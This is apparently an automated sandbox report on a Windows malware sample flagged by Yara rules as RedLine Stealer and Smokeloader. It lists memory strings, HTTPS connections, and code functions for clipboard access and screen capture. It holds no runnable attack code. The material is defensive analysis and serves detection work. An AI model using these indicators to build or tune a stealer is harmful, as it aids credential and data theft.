Source: 628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 628E.tmp.exe, 00000003.00000003.1661957645.0000000002ED6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: 628E.tmp.exe, 00000003.00000003.1662159628.0000000002F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: 628E.tmp.exe, 00000003.00000003.1662159628.0000000002F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: 628E.tmp.exe, 00000003.00000003.1662159628.0000000002F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 628E.tmp.exe, 00000003.00000003.1662159628.0000000002F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49717 version: TLS 1.2

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00631942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_00631942

Source: C:\Users\user\Desktop\J18zxRjOes.exe

0_2_004016DF

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Code function: 3_2_00437C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

3_2_00437C10

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.1736228708.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3948087329.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00632361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_00632361
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00632605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_00632605

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0043D678	0_2_0043D678
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00644172	0_2_00644172
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0065ED47	0_2_0065ED47
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00658289	0_2_00658289
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_006576EB	0_2_006576EB
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0065D755	0_2_0065D755
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_006587C7	0_2_006587C7
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00646916	0_2_00646916
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0064398C	0_2_0064398C
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00657A5D	0_2_00657A5D
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0063EBDB	0_2_0063EBDB
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0065ED47	0_2_0065ED47
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00657D07	0_2_00657D07
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00648D16	0_2_00648D16
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00666F26	0_2_00666F26
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00657FCE	0_2_00657FCE
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0043D0D0	3_2_0043D0D0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00408A60	3_2_00408A60
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00422370	3_2_00422370
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00421B30	3_2_00421B30
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00418BA2	3_2_00418BA2
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00437850	3_2_00437850
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0041906A	3_2_0041906A
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00426010	3_2_00426010
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004438E0	3_2_004438E0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004180F0	3_2_004180F0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004438F9	3_2_004438F9
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004438FB	3_2_004438FB
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00427885	3_2_00427885
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0041D8B0	3_2_0041D8B0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00406950	3_2_00406950
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00444950	3_2_00444950
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0040E16E	3_2_0040E16E
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0040D172	3_2_0040D172
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0043210B	3_2_0043210B
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00403910	3_2_00403910
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00429917	3_2_00429917
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00406120	3_2_00406120
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0040B92C	3_2_0040B92C
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0042F1C1	3_2_0042F1C1
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004239EB	3_2_004239EB
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00421180	3_2_00421180
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0041618C	3_2_0041618C
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0043099F	3_2_0043099F
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0041F9A0	3_2_0041F9A0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0041D1B0	3_2_0041D1B0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0042E9B0	3_2_0042E9B0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0041BA52	3_2_0041BA52
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0043025E	3_2_0043025E
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0042621B	3_2_0042621B
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0042BA20	3_2_0042BA20
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00417222	3_2_00417222
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00443A30	3_2_00443A30
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004042C0	3_2_004042C0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00443AC0	3_2_00443AC0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004302CD	3_2_004302CD
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0040F2D0	3_2_0040F2D0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004442E0	3_2_004442E0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0040B280	3_2_0040B280
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004352B0	3_2_004352B0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00402B40	3_2_00402B40
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00443B60	3_2_00443B60
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00409B70	3_2_00409B70
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00429B7B	3_2_00429B7B
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0042FB7D	3_2_0042FB7D
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00405B00	3_2_00405B00
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00440B00	3_2_00440B00
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00428B10	3_2_00428B10
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00419B30	3_2_00419B30
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00411BDE	3_2_00411BDE
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004123EC	3_2_004123EC
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00428C62	3_2_00428C62
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0043C460	3_2_0043C460
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0043B410	3_2_0043B410
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00441C26	3_2_00441C26
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00444C20	3_2_00444C20
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004064C0	3_2_004064C0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0042F4E1	3_2_0042F4E1
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004324EE	3_2_004324EE
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0041D4A0	3_2_0041D4A0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00408D10	3_2_00408D10
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0043E520	3_2_0043E520
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00442DCA	3_2_00442DCA
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00415DD8	3_2_00415DD8
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00425DA0	3_2_00425DA0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004085B0	3_2_004085B0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00409660	3_2_00409660
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00404E20	3_2_00404E20
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0043C6C0	3_2_0043C6C0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0043E6E0	3_2_0043E6E0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004186E5	3_2_004186E5
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00444680	3_2_00444680
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0041DE90	3_2_0041DE90
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0043CE90	3_2_0043CE90
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00428750	3_2_00428750
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0043DF60	3_2_0043DF60
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00429F7C	3_2_00429F7C
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00433707	3_2_00433707
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00402F10	3_2_00402F10
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00425713	3_2_00425713
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0042F716	3_2_0042F716
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00407730	3_2_00407730
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00427FC0	3_2_00427FC0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004437D0	3_2_004437D0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00433FDF	3_2_00433FDF
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004127E0	3_2_004127E0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0042A7F0	3_2_0042A7F0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_00434FF0	3_2_00434FF0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0042AF92	3_2_0042AF92
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02105257	3_2_02105257
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02104246	3_2_02104246
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0210D337	3_2_0210D337
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020E8357	3_2_020E8357
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02102372	3_2_02102372
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D6387	3_2_020D6387
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020DD3D9	3_2_020DD3D9
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020DE3D5	3_2_020DE3D5
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020F13E7	3_2_020F13E7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020E603F	3_2_020E603F
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D5087	3_2_020D5087
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0210D0F7	3_2_0210D0F7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020EE0F7	3_2_020EE0F7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0210E1C7	3_2_0210E1C7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020E2653	3_2_020E2653
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0210B677	3_2_0210B677
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0210C6C7	3_2_0210C6C7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020ED707	3_2_020ED707
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D6727	3_2_020D6727
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02102755	3_2_02102755
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020FF748	3_2_020FF748
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0210E787	3_2_0210E787
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020ED417	3_2_020ED417
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020FF428	3_2_020FF428
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_021004C5	3_2_021004C5
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020DB4E7	3_2_020DB4E7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02105517	3_2_02105517
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02100534	3_2_02100534
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D4527	3_2_020D4527
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020DF537	3_2_020DF537
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02114547	3_2_02114547
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020F25D7	3_2_020F25D7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020E2A47	3_2_020E2A47
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020FAA57	3_2_020FAA57
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02107AB7	3_2_02107AB7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020F7B02	3_2_020F7B02
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020EDB17	3_2_020EDB17
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D3B77	3_2_020D3B77
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02114BB7	3_2_02114BB7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D6BB7	3_2_020D6BB7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D8817	3_2_020D8817
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D98C7	3_2_020D98C7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_021148E7	3_2_021148E7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0210C927	3_2_0210C927
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020E7950	3_2_020E7950
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020FF97D	3_2_020FF97D
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0210396E	3_2_0210396E
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D7997	3_2_020D7997
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020F89B7	3_2_020F89B7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020E1E45	3_2_020E1E45
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02114E87	3_2_02114E87
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02111E8C	3_2_02111E8C
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D8F77	3_2_020D8F77
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020EFC07	3_2_020EFC07
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02100C06	3_2_02100C06
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020FEC17	3_2_020FEC17
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020F3C52	3_2_020F3C52
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020FAC89	3_2_020FAC89
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020FBC87	3_2_020FBC87
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020EBCB9	3_2_020EBCB9
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D8CC7	3_2_020D8CC7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D5D67	3_2_020D5D67
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02110D67	3_2_02110D67
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020F1D97	3_2_020F1D97
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D2DA7	3_2_020D2DA7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D9DD7	3_2_020D9DD7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020FFDE4	3_2_020FFDE4
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020E7DFA	3_2_020E7DFA

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: String function: 00408280 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: String function: 020E4E87 appears 145 times
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: String function: 020D84E7 appears 71 times
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: String function: 00414C20 appears 145 times
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: String function: 00410720 appears 53 times
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: String function: 00640987 appears 53 times
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: String function: 0040FDB2 appears 125 times
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: String function: 00640019 appears 121 times

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1796

Source: J18zxRjOes.exe	Binary or memory string: OriginalFileName vs J18zxRjOes.exe
Source: J18zxRjOes.exe, 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs J18zxRjOes.exe
Source: J18zxRjOes.exe, 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs J18zxRjOes.exe
Source: J18zxRjOes.exe, 00000000.00000003.1591180938.0000000003428000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesOriginal4 vs J18zxRjOes.exe
Source: J18zxRjOes.exe, 00000000.00000003.1501118061.0000000002170000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs J18zxRjOes.exe
Source: J18zxRjOes.exe, 00000000.00000000.1492630675.000000000045A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOriginal4 vs J18zxRjOes.exe
Source: J18zxRjOes.exe	Binary or memory string: OriginalFilenamesOriginal4 vs J18zxRjOes.exe

Source: J18zxRjOes.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000003.00000002.1736228708.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
